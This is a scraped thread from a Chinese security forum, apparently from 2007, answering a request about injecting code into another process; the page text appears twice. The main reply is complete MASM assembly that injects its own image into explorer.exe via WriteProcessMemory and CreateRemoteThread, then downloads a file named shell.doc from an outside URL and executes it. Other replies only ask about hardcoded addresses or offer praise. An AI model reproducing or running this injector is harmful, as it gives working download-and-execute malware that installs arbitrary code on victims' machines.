[求助]注入目标进程并调用其中的函数-编程技术-看雪-安全社区|安全招聘|kanxue.com

最新回复 (5)
Winker 雪币： 796 活跃值： (370) 能力值： ( LV9，RANK：380 ) 在线值：发帖 133 回帖 1127 粉丝 18 关注私信	Winker 8 2 楼 .386 .model flat, stdcall option casemap:none include windows.inc include kernel32.inc include user32.inc include urlmon.inc include shell32.inc includelib kernel32.lib includelib user32.lib includelib urlmon.lib includelib shell32.lib .data szDesktopClass db 'Progman',0 ;explorer.exe 的窗口类 szDesktopWindow db 'Program Manager',0 szURL db 'Http://chenmingzhong87.xinwen365.com/shell.doc',0 szSaveFile db 'C:\shell.doc',0 .data? hModule dd ? hWnd dd ? hProcess dd ? ShellSize dd ? Pid dd ? Written dd ? dwTid dd ? .code Shellcode proc push 00403008H call LoadLibrary push 00403013H call LoadLibrary invoke URLDownloadToFile,NULL,addr szURL,addr szSaveFile,NULL,NULL invoke ShellExecute,0,0,addr szSaveFile,0,0,SW_SHOW invoke ExitThread,0 ret Shellcode endp start: invoke GetModuleHandle, 0 mov hModule, eax mov edi, eax assume edi:ptr IMAGE_DOS_HEADER add edi, [edi].e_lfanew add edi, sizeof dword add edi, sizeof IMAGE_FILE_HEADER assume edi:ptr IMAGE_OPTIONAL_HEADER32 mov eax, [edi].SizeOfImage mov ShellSize, eax assume edi:NOTHING invoke FindWindow,addr szDesktopClass,addr szDesktopWindow invoke GetWindowThreadProcessId, eax, addr Pid invoke OpenProcess,PROCESS_CREATE_THREAD or PROCESS_VM_WRITE+\ PROCESS_VM_OPERATION,FALSE,Pid mov hProcess, eax invoke VirtualFreeEx, hProcess, hModule, 0, MEM_RELEASE invoke VirtualAllocEx, hProcess, hModule, ShellSize, MEM_COMMIT or MEM_RESERVE, PAGE_EXECUTE_READWRITE mov hWnd, eax invoke WriteProcessMemory, hProcess, hWnd, hModule, ShellSize, addr Written invoke CreateRemoteThread, hProcess, 0, 0, addr Shellcode, hModule, 0, addr dwTid invoke ExitProcess, 0 end start 2007-2-2 18:05 0
Aker 雪币： 2134 活跃值： (14) 能力值： (RANK：170 ) 在线值：发帖 50 回帖 773 粉丝 3 关注私信	Aker 4 3 楼 push 00403008H call LoadLibrary push 00403013H call LoadLibrary 这个是怎么来的;) 2007-2-3 11:56 0
jameswei 雪币： 200 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 1 回帖 2 粉丝 0 关注私信	jameswei 4 楼谢谢回复，只是我不懂汇编啊。最好能提供vc++的代码例子 2007-2-3 12:12 0
jjnet 雪币： 101 活跃值： (12) 能力值： ( LV12，RANK：210 ) 在线值：发帖 28 回帖 503 粉丝 0 关注私信	jjnet 5 5 楼 push 00403008H call LoadLibrary push 00403013H call LoadLibrary 牛人 2007-2-3 16:43 0
sixL 雪币： 248 活跃值： (1056) 能力值： ( LV2，RANK：10 ) 在线值：发帖 6 回帖 164 粉丝 1 关注私信	sixL 6 楼 “。。。。。。”大象。 2007-2-3 16:54 0
	游客登录 \| 注册方可回帖回帖表情雪币赚取及消费高级回复

最新回复 (5)
Winker 雪币： 796 活跃值： (370) 能力值： ( LV9，RANK：380 ) 在线值：发帖 133 回帖 1127 粉丝 18 关注私信	Winker 8 2 楼 .386 .model flat, stdcall option casemap:none include windows.inc include kernel32.inc include user32.inc include urlmon.inc include shell32.inc includelib kernel32.lib includelib user32.lib includelib urlmon.lib includelib shell32.lib .data szDesktopClass db 'Progman',0 ;explorer.exe 的窗口类 szDesktopWindow db 'Program Manager',0 szURL db 'Http://chenmingzhong87.xinwen365.com/shell.doc',0 szSaveFile db 'C:\shell.doc',0 .data? hModule dd ? hWnd dd ? hProcess dd ? ShellSize dd ? Pid dd ? Written dd ? dwTid dd ? .code Shellcode proc push 00403008H call LoadLibrary push 00403013H call LoadLibrary invoke URLDownloadToFile,NULL,addr szURL,addr szSaveFile,NULL,NULL invoke ShellExecute,0,0,addr szSaveFile,0,0,SW_SHOW invoke ExitThread,0 ret Shellcode endp start: invoke GetModuleHandle, 0 mov hModule, eax mov edi, eax assume edi:ptr IMAGE_DOS_HEADER add edi, [edi].e_lfanew add edi, sizeof dword add edi, sizeof IMAGE_FILE_HEADER assume edi:ptr IMAGE_OPTIONAL_HEADER32 mov eax, [edi].SizeOfImage mov ShellSize, eax assume edi:NOTHING invoke FindWindow,addr szDesktopClass,addr szDesktopWindow invoke GetWindowThreadProcessId, eax, addr Pid invoke OpenProcess,PROCESS_CREATE_THREAD or PROCESS_VM_WRITE+\ PROCESS_VM_OPERATION,FALSE,Pid mov hProcess, eax invoke VirtualFreeEx, hProcess, hModule, 0, MEM_RELEASE invoke VirtualAllocEx, hProcess, hModule, ShellSize, MEM_COMMIT or MEM_RESERVE, PAGE_EXECUTE_READWRITE mov hWnd, eax invoke WriteProcessMemory, hProcess, hWnd, hModule, ShellSize, addr Written invoke CreateRemoteThread, hProcess, 0, 0, addr Shellcode, hModule, 0, addr dwTid invoke ExitProcess, 0 end start 2007-2-2 18:05 0
Aker 雪币： 2134 活跃值： (14) 能力值： (RANK：170 ) 在线值：发帖 50 回帖 773 粉丝 3 关注私信	Aker 4 3 楼 push 00403008H call LoadLibrary push 00403013H call LoadLibrary 这个是怎么来的;) 2007-2-3 11:56 0
jameswei 雪币： 200 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 1 回帖 2 粉丝 0 关注私信	jameswei 4 楼谢谢回复，只是我不懂汇编啊。最好能提供vc++的代码例子 2007-2-3 12:12 0
jjnet 雪币： 101 活跃值： (12) 能力值： ( LV12，RANK：210 ) 在线值：发帖 28 回帖 503 粉丝 0 关注私信	jjnet 5 5 楼 push 00403008H call LoadLibrary push 00403013H call LoadLibrary 牛人 2007-2-3 16:43 0
sixL 雪币： 248 活跃值： (1056) 能力值： ( LV2，RANK：10 ) 在线值：发帖 6 回帖 164 粉丝 1 关注私信	sixL 6 楼 “。。。。。。”大象。 2007-2-3 16:54 0
	游客登录 \| 注册方可回帖回帖表情雪币赚取及消费高级回复